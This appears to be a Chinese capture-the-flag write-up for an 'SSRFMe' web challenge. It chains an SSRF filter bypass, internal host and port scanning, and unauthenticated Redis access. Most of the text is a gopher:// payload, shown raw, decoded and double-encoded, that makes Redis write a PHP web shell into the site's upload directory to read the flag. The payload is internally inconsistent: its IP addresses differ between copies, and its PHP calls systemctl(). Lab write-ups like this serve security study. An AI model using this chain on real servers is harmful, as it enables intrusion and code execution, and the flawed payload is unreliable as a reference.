Web-SSRFMe
分析代码
- 分析代码 ,代码尝试过滤某些恶意输入(如
file://、dict://、../、127.0.0.1
和localhost
)
测试ssrf
- 接收url参数,测试访问外部 URL
3. 传递参数info
,会显示phpinfo()
扫描内网存活主机
- 发现内网主机IP
5. 测试相邻主机IP,172.19.0.2
有回显
6. 扫描端口
7. 扫描到开放了 80
和 6379
端口
8. 访问 6379
端口,出现redis
报错,尝试redis
未授权访问攻击
扫描网站可写入目录
- 扫描一下网站有哪些目录,并尝试写入
- 扫描到
upload
目录
生成payload
- 使用
gopherus
生成payload
gopher://172.19.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2436%0D%0A%0A%0A%3C%3Fphp%20systemctl%28%27cat%20/flag%27%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
- URLcode转码,分析payload做了什么事
gopher://172.20.0.2:6379/_*1
$8
flushall
*3
$3
set
$1
1
$36
<?php systemctl('cat /flag'); ?>
*4
$6
config
$3
set
$3
dir
$20
/var/www/html/upload
*4
$6
config
$3
set
$10
dbfilename
$9
shell.php
*1
$4
save
- 二次编码
gopher%3a%2f%2f172.19.0.2%3a6379%2f_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252436%250D%250A%250A%250A%253C%253Fphp%2520systemctl%2528%2527cat%2520%2fflag%2527%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A%2fvar%2fwww%2fhtml%2fupload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
测试paylaod
- 测试
payload
,拿到flag